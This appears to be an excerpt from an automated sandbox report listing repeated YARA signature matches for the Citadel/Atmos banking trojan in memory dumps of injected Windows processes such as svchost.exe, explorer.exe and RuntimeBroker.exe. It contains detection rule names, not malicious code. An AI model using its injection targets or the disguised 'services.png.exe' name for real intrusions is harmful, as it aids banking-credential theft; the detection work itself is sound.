                        Source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 34.0.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 24.0.svchost.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 24.0.svchost.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 24.0.svchost.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 27.3.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 27.3.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 27.3.backgroundTaskHost.exe.e20000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 26.0.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 26.0.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 26.0.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 2.3.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 2.3.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 2.3.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 28.3.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 28.3.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 28.3.RuntimeBroker.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 9.0.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 9.0.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 9.0.RuntimeBroker.exe.110000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 3.0.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 3.0.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 3.0.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 3.0.svchost.exe.910000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 3.0.svchost.exe.910000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 3.0.svchost.exe.910000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 24.3.svchost.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 24.3.svchost.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 24.3.svchost.exe.fb0000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 2.3.sihost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 2.3.sihost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 2.3.sihost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 6.3.explorer.exe.c350000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 6.3.explorer.exe.c350000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 15.0.smartscreen.exe.290000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 15.0.smartscreen.exe.290000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 15.0.smartscreen.exe.290000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 14.0.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 14.0.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 14.0.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 0.0.services.png.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 38.0.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 35.2.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 36.2.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 2.0.sihost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 2.0.sihost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 2.0.sihost.exe.ac0000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 10.0.SearchApp.exe.a90000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 10.0.SearchApp.exe.a90000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 10.0.SearchApp.exe.a90000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 30.2.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 27.0.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 27.0.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 27.0.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 29.0.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 29.0.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 29.0.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 31.0.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 34.2.XRdxSzSUL8yOL.exe.2400000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 4.0.svchost.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 4.0.svchost.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 4.0.svchost.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 5.0.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 5.0.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 5.0.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 1.0.nyheukpo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 1.3.nyheukpo.exe.20f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 5.3.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 5.3.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 5.3.ctfmon.exe.a50000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 40.0.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 14.3.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 14.3.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 14.3.RuntimeBroker.exe.ab0000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 15.0.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 15.0.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 15.0.smartscreen.exe.290000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 7.0.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 41.2.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 2.0.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 2.0.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 2.0.sihost.exe.ac0000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 7.0.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 7.0.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 32.2.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 29.3.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 29.3.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 29.3.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 37.0.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 7.3.svchost.exe.d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
